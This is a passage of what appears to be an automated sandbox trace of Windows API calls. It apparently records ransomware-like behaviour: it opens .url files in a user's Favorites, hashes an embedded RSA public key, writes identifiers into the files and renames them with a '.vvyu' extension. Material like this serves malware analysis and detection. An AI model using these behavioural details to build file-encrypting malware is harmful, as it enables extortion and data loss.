RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.159] GetCurrentThreadId () returned 0x264 [0189.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0189.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39928 [0189.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0189.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39988 [0189.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399a0 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39940 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39910 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0189.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0189.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39060 | out: hHeap=0x6a0000) returned 1 [0189.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.170] WriteFile (in: hFile=0x584, lpBuffer=0x794008*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x794008*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.171] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.171] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.172] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.172] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.173] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.173] CloseHandle (hObject=0x584) returned 1 [0189.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0189.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d45778 [0189.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0189.174] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url.vvyu")) returned 1 [0189.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.176] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d9d0 | out: hHeap=0x6a0000) returned 1 [0189.179] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee55be0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0189.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d9d0 [0189.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.180] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0189.180] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.180] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.180] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.183] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.183] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.184] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.184] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.184] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.184] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.184] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.184] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.185] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.185] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.185] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.185] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.186] GetLastError () returned 0x0 [0189.186] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.186] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.186] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.186] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.186] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.186] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39060 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d390a8 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.187] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0189.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39940 [0189.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39928 [0189.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 